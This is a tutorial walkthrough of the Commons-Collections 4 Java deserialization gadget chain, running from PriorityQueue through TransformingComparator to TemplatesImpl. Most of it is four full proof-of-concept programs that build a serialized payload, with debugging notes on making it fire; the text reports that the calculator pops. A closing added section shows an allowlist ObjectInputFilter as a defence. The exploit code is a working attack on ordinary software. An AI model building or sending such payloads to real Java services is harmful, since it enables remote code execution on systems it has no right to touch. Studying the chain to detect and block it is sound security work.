# CC4

CC4 requires the 4.x major version of commons-collections.

The second half of the chain is the same as CC3, but because commons-collections went through a major upgrade, a new first half of the chain appeared.

Configuration file:

```xml
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>
```

## Chain analysis
Still starting from transform, we look for places that call the transform method, and find that in the comparators package the compare method of the TransformingComparator class calls transform. This is a classic comparator.

```java
public int compare(final I obj1, final I obj2) {
    final O value1 = this.transformer.transform(obj1);
    final O value2 = this.transformer.transform(obj2);
    return this.decorated.compare(value1, value2);
}
```
Continue backwards and look for callers of compare. The search method is the same as before, but this time there are quite a few results. The ideal result is a readObject method of some class that calls compare. Going straight to the result: the readObject method of the PriorityQueue class calls compare. PriorityQueue implements the Serializable interface, so it can be serialized. As its code shows, the last thing readObject does in PriorityQueue is call the heapify method. Following into heapify:

```java
private void heapify() {
    for (int i = (size >>> 1) - 1; i >= 0; i--)
        siftDown(i, (E) queue[i]);
}
```
This method calls siftDown inside a for loop, whose loop variable i is initialised from `size >>> 1` (size shifted right with the unsigned shift operator `>>>`). Following into siftDown:

```java
private void siftDown(int k, E x) {
    if (comparator != null)
        siftDownUsingComparator(k, x);
    else
        siftDownComparable(k, x);
}
```
siftDown checks whether comparator is null with `if (comparator != null)`; if it is not null it calls siftDownUsingComparator. Following into that method, siftDownUsingComparator finally calls compare through `comparator.compare()`, which is where code execution is ultimately reached; the remaining half of the chain then joins the CC3 chain.

The constructor of this class is also directly accessible, and the parameter passed in is the comparator. At this point things are fairly clear:

PriorityQueue#readObject -> PriorityQueue#heapify -> PriorityQueue#siftDown -> siftDownUsingComparator -> TransformingComparator#compare

What follows is the CC3 chain.

## Writing the POC

Now we can try to write the POC.
```java
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.*;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Comparator;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;

public class CC4 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> templatesClass = templates.getClass();
        Field nameFeild = templatesClass.getDeclaredField("_name");
        nameFeild.setAccessible(true);
        nameFeild.set(templates, "aaa");
        Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("C:\\tmp\\Test.class"));
        byte[][] codes = {code};
        bytecodesField.set(templates, codes);
        // modify the _tfactory field
        // Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
        // tfactoryField.setAccessible(true);
        // tfactoryField.set(templates, new TransformerFactoryImpl());
        // templates.newTransformer();
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
        // transform() will be invoked below; it needs an Object input parameter, and here input is an object of the TrAXFilter class
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        TransformingComparator comparator = new TransformingComparator(chainedTransformer);
        PriorityQueue<Transformer> priorityQueue = new PriorityQueue<Transformer>(comparator);
        serialization(priorityQueue);
        deserialization();
    }

    public static void serialization(Object o) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("cc4.ser"));
        objectOutputStream.writeObject(o);
        objectOutputStream.close();
    }

    public static void deserialization() throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("cc4.ser"));
        objectInputStream.readObject();
        objectInputStream.close();
    }
}
```

But when the run finishes, we find that no code was executed at all: it simply ends, with no error message either.

## Solving the problem
Since we want to get PriorityQueue's readObject method to run, we set a breakpoint directly at heapify and start debugging. Stepping in here we can see that size is 0. Next comes the first iteration of the for loop, where i is computed from `size >>> 1`; in Java this means shifting a number's binary representation right by some number of bits and filling the vacated positions on the left with 0. Because size is 0 here, shifting right by 1 still gives 0, then `i = 0 - 1` gives `i = -1`; the condition `i >= 0` is not satisfied, so the for loop body is never entered.

The binary of 2 is 00000010 -------> 00000001 (shifting right by one bit gives 1), so if we make size greater than or equal to 2, the for loop will be entered. There are two ways to do this. First, size is declared private, so we can try to modify its value directly through reflection. The second way is to put two values into the queue, which also works.

## Solving it by putting values into the queue
First we can store values directly in priorityQueue: the add method appends to the queue, and it is enough to pass a Transformer, so we try passing two ConstantTransformers.

```java
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.*;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Comparator;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;

public class CC4 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> templatesClass = templates.getClass();
        Field nameFeild = templatesClass.getDeclaredField("_name");
        nameFeild.setAccessible(true);
        nameFeild.set(templates, "aaa");
        Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("C:\\tmp\\Test.class"));
        byte[][] codes = {code};
        bytecodesField.set(templates, codes);
        // modify the _tfactory field
        Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates, new TransformerFactoryImpl());
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
        // transform() will be invoked below; it needs an Object input parameter, and here input is an object of the TrAXFilter class
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        TransformingComparator comparator = new TransformingComparator(chainedTransformer);
        PriorityQueue<Transformer> priorityQueue = new PriorityQueue<Transformer>(comparator);
        priorityQueue.add(new ConstantTransformer(1));
        priorityQueue.add(new ConstantTransformer(2));
        serialization(priorityQueue);
        // deserialization();
    }

    public static void serialization(Object o) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("cc4.ser"));
        objectOutputStream.writeObject(o);
        objectOutputStream.close();
    }

    public static void deserialization() throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("cc4.ser"));
        objectInputStream.readObject();
        objectInputStream.close();
    }
}
```

But we find that the code already pops the calculator during serialization. Continuing to debug, we set a breakpoint inside the add method while adding and find that it calls the offer method. On the second add, since a value was already added before, size has become 1, so when `int i = size` is initialised, i becomes 1. Following into offer, its full code is as follows:
```java
public boolean offer(E e) {
    if (e == null)
        throw new NullPointerException();
    modCount++;
    int i = size;
    if (i >= queue.length)
        grow(i + 1);
    size = i + 1;
    if (i == 0)
        queue[0] = e;
    else
        siftUp(i, e);
    return true;
}
```
Here siftUp is called again. Following it, siftUp calls siftUpUsingComparator, and following that, siftUpUsingComparator turns out to call compare, which is what caused our code to execute. So here one of the earlier values has to be swapped in through reflection, just like in the earlier CC chains: for example, replacing chainedTransformer or the value inside comparator is enough.

```java
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.*;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Comparator;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;

public class CC4 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> templatesClass = templates.getClass();
        Field nameFeild = templatesClass.getDeclaredField("_name");
        nameFeild.setAccessible(true);
        nameFeild.set(templates, "aaa");
        Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("C:\\tmp\\Test.class"));
        byte[][] codes = {code};
        bytecodesField.set(templates, codes);
        // modify the _tfactory field
        Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates, new TransformerFactoryImpl());
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
        // transform() will be invoked below; it needs an Object input parameter, and here input is an object of the TrAXFilter class
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        TransformingComparator comparator = new TransformingComparator(new ConstantTransformer(1));
        PriorityQueue<Transformer> priorityQueue = new PriorityQueue<Transformer>(comparator);
        // work around the for loop not being entered
        priorityQueue.add(new ConstantTransformer(1));
        priorityQueue.add(new ConstantTransformer(2));
        Class<? extends TransformingComparator> aClass = comparator.getClass();
        Field transformerField = aClass.getDeclaredField("transformer");
        transformerField.setAccessible(true);
        transformerField.set(comparator, chainedTransformer);
        // serialization(priorityQueue);
        deserialization();
    }

    public static void serialization(Object o) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("cc4.ser"));
        objectOutputStream.writeObject(o);
        objectOutputStream.close();
    }

    public static void deserialization() throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("cc4.ser"));
        objectInputStream.readObject();
        objectInputStream.close();
    }
}
```

## Solving it with reflection
Obtain the Class object of PriorityQueue directly through reflection, fetch the private field, and finally modify that field's value.

```java
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.*;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Comparator;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;

public class CC4 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> templatesClass = templates.getClass();
        Field nameFeild = templatesClass.getDeclaredField("_name");
        nameFeild.setAccessible(true);
        nameFeild.set(templates, "aaa");
        Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("C:\\tmp\\Test.class"));
        byte[][] codes = {code};
        bytecodesField.set(templates, codes);
        // modify the _tfactory field
        Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates, new TransformerFactoryImpl());
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
        // transform() will be invoked below; it needs an Object input parameter, and here input is an object of the TrAXFilter class
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        TransformingComparator comparator = new TransformingComparator(chainedTransformer);
        PriorityQueue<Transformer> priorityQueue = new PriorityQueue<Transformer>(comparator);
        Class<? extends PriorityQueue> aClass = priorityQueue.getClass();
        Field sizeField = aClass.getDeclaredField("size");
        sizeField.setAccessible(true);
        sizeField.set(priorityQueue, 2);
        serialization(priorityQueue);
        deserialization();
    }

    public static void serialization(Object o) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("cc4.ser"));
        objectOutputStream.writeObject(o);
        objectOutputStream.close();
    }

    public static void deserialization() throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("cc4.ser"));
        objectInputStream.readObject();
        objectInputStream.close();
    }
}
```

With the code above, the code executes successfully and the calculator pops. There is no need here to modify chainedTransformer or comparator through reflection, because we changed the value of size through reflection instead of using the add method, so compare is not invoked during serialization and the calculator does not pop during serialization.
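The chain above enters through `java.util.PriorityQueue#readObject`, a JDK class, which is why blocking commons-collections classes alone is a weak defence: the container is legitimate, and only the comparator it carries is attacker-chosen. The following is an added example, not code from the original post, showing a JEP 290 `ObjectInputFilter` (Java 9+) that allowlists the classes an application actually expects, so a `PriorityQueue` carrying an unexpected comparator is rejected while its `comparator` field is being read, before `readObject()` reaches `heapify()`. The names `DeserializationFilterDemo` and `UntrustedComparator` are constructed for this demo; `UntrustedComparator` stands in for any comparator class the application does not expect, such as `TransformingComparator`.

```java
// Added example (not from the original post): allowlist-based deserialization filter.
// Requires Java 9+ for java.io.ObjectInputFilter.
import java.io.*;
import java.util.Comparator;
import java.util.PriorityQueue;
import java.util.Set;

public class DeserializationFilterDemo {

    // Classes this application legitimately deserializes (constructed allowlist).
    // PriorityQueue itself is a JDK class, so a denylist of commons-collections
    // would not stop its readObject(); only the comparator classes we expect are permitted.
    static final Set<String> ALLOWED = Set.of(
            "java.util.PriorityQueue",
            "java.lang.Integer",
            "java.lang.Number"      // Integer's serializable superclass also appears in the stream
    );

    // ObjectInputFilter is a functional interface; it is consulted for every class
    // descriptor (and array/depth/reference limits) encountered while reading.
    static final ObjectInputFilter ALLOWLIST_FILTER = info -> {
        Class<?> c = info.serialClass();
        if (c == null) {
            // Callback about a limit (depth, array length, references), not a class.
            return ObjectInputFilter.Status.UNDECIDED;
        }
        while (c.isArray()) {
            c = c.getComponentType();   // judge arrays by their element type
        }
        if (c.isPrimitive() || ALLOWED.contains(c.getName())) {
            return ObjectInputFilter.Status.ALLOWED;
        }
        // Rejection is the detection signal: log it, then let readObject() fail.
        System.err.println("deserialization rejected: " + c.getName());
        return ObjectInputFilter.Status.REJECTED;
    };

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    static Object deserializeWithFilter(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(ALLOWLIST_FILTER);   // must be set before the first readObject()
            return ois.readObject();
        }
    }

    // Constructed stand-in for an attacker-chosen comparator class (hypothetical name).
    static class UntrustedComparator implements Comparator<Integer>, Serializable {
        private static final long serialVersionUID = 1L;
        public int compare(Integer a, Integer b) { return Integer.compare(a, b); }
    }

    public static void main(String[] args) throws Exception {
        // Benign stream: natural-ordering queue of Integers, every class on the allowlist.
        PriorityQueue<Integer> benign = new PriorityQueue<>();
        benign.add(3);
        benign.add(1);
        PriorityQueue<?> restored = (PriorityQueue<?>) deserializeWithFilter(serialize(benign));
        System.out.println("benign queue restored, head = " + restored.peek());

        // Same container type, but carrying a comparator class the application never expects.
        PriorityQueue<Integer> suspicious = new PriorityQueue<>(new UntrustedComparator());
        suspicious.add(3);
        suspicious.add(1);
        try {
            deserializeWithFilter(serialize(suspicious));
            System.out.println("unexpected: suspicious stream was accepted");
        } catch (InvalidClassException e) {
            // Thrown while defaultReadObject() reads the 'comparator' field,
            // i.e. before PriorityQueue.readObject() ever reaches heapify().
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```

Run it with a Java 9 or newer JDK. The same allowlist can be enforced process-wide, without code changes, by starting the JVM with `-Djdk.serialFilter='java.util.PriorityQueue;java.lang.Integer;java.lang.Number;!*'` (only sensible if those really are the only classes the process deserializes); a stream containing `TransformingComparator` or `TemplatesImpl` then fails with `InvalidClassException` at the class descriptor, and the rejected class name in the log is the indicator worth alerting on.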